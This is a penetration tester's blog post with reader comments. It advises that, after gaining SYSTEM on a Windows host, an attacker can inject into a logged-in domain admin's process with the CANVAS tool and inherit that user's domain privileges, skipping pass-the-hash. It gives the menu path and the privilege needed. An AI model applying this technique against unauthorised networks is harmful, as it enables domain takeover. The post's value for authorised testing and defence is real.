I really try not to rant, but since this is my blog I’ll vent a little. A poster on a forum is asking for help getting pass-the-hash functionality into CANVAS. Besides for the fact that he could simply upload and run the tool, he’s still missing a few key points.
First, you don’t need to crack the hash. It’s often useful to do so — having a list of passwords is one of the best ways to maintain access to a network. But it’s a “nice to have” thing and completely unnecessary.
Second, the example he’s using is a remote system is compromised and a domain admin logs in via RDP or maybe uses domain credentials on a SQL server. If you’re SYSTEM on the local box, you can inject into that user’s process. When you do that, you are the domain user/admin. This is nicer than pass-the-hash style attacks because you can maintain the process. Active Directory uses kerberos so passing the hash should only work for so long.
To do this simply open CANVAS and browse to Commands->PROCESSINJECT and inject into the user process (RDP, Explorer, iexplorer, firefox, Word, whatever). At this point Canvas will execute commands as the owner of the process; with the same domain privileges as that user. Note you need the seDebugPrivilege to do this which is SYSTEM, Administrators, and maybe (?) power users.
Kerberos is a single-singon protocl, so what makes you think that it will not be vulnerable to pass-the-hash attack?
Granted there are no tools publicly available that does that on Kerberos. But when it becomes a stream there is no guarantees that this will be the case.
Or there is guarantees that Kerberos will be immune againt pass-the-hash attacks?
To my knowledge Kerberos isn’t vulnerable to PTH style attacks due to the fact that permission tokens are time based and limited. I’m not a kerberos expert – not even close so I won’t dig into trying to get into possible attack vectors. My point is that if you have system on a box (generally required for PTH) and a process is running or will run with the account you need injecting into the process is easier. It’s a tried and true technique.
The issue is mostly letting what you want to do interfere with what you’re trying to do.